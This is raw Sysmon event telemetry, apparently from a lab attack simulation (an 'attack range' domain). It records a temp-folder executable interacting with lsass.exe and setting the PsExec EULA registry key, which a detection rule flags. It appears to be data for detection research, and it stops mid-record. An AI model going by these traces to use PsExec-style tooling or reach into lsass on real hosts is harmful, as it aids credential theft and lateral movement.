13241300x8000000000000000293759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ac-0xce084be9) 13241300x8000000000000000293758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000293757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0086a462) 13241300x8000000000000000293756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289c-0x0a7f7be9) 13241300x8000000000000000293755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a4-0x6c43e3e9) 13241300x8000000000000000293754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:59:26.695{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ac-0xce084be9) 23542300x8000000000000000293753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.413{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=182FF56799D9055A3C29E4A1F155F439,SHA256=21697F2382AE33E7293653A5729F7B29F9FFC0721F51D8B6C0D36E94115F5050,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.293{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.293{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:59:26.258{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 354300x8000000000000000293749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:23.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53828-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.124{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-138E-6216-7606-000000003802}6776C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.124{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-138E-6216-7606-000000003802}6776C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.093{C8EA50B7-138E-6216-7606-000000003802}67763972C:\Windows\system32\conhost.exe{C8EA50B7-138D-6216-7506-000000003802}1912C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.024{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000293744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.024{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.024{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF86a1b2.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:26.009{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-138E-6216-7606-000000003802}6776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:25.993{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-138E-6216-7606-000000003802}6776C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:27.566{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07CDEB96A0A5334A1E7AE376E6B50295,SHA256=FDEACE9D293DF98D65C6B8808B845FC68CFC1335009312DDAD244BC9E836C6A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:27.410{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7456A30A520025635D3750F253F1458,SHA256=A31E0372020DBF3AB09EE292CF47AFEBCA3BBF7FD4C064D15F4B86642AA85241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:28.597{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50191B942EC0DCC0DA2D68EAA6BA1527,SHA256=7E6673DF0321EFFF76D593D3D9E1ABC303735D1F3898A879964EAA6AFF514704,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.494{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.478{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:28.441{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087180C1E06061F9F7DF732E044FF66D,SHA256=69938EE08982C7AEB477979C4B26FA3A089BD21F95EF82982400AAC55769BA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:29.723{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB85B423131C058AD4D73898366DDC8,SHA256=C1ADECECE2A5B4599C84DBA95F770BB6022062470A7D2714F96767F87CE17498,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:29.461{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18DBAFFEBAB501EC4AACD799394E97AF,SHA256=BACBC3DBBED4ED10C009BDC1A1E133C15700377F49B42D2F4848FEEE81744BA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:29.222{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-142MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218157Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:30.738{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4C0A0C20413241D5D1C24990B58B650,SHA256=4F215A1957B34EC1A63BFB0B783B9AD8D11D2BC711547F045727C08372BEA83D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:30.479{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB1F95D0E0870C2A93A3A89A473F488E,SHA256=CE724CD2E5BC1982124B0FAB082189B8E612C28895956B5353A31A4FC0C84ABB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218156Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:30.363{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0B1B01127FABA3B316D4CAC36B342638,SHA256=C9BC8BEF9D0F39878217959380DE75F50F1BEDD86C4729608AF6B518C744CEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:30.204{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-143MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218158Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:31.785{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0B1A04450BA57A094E0D76A0DD213B,SHA256=B9B53A85E8A23CC131278E29418D64C5134D38DECC5C95DD96319D59A8B4D071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:31.508{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF773440CE17A500745D1AF276C2B1E8,SHA256=09F1D7D53A6ACF2BAF602093CB3A3310130FF6E42E89775CF8F39334F97303DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:29.521{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53831-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000218163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:32.800{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 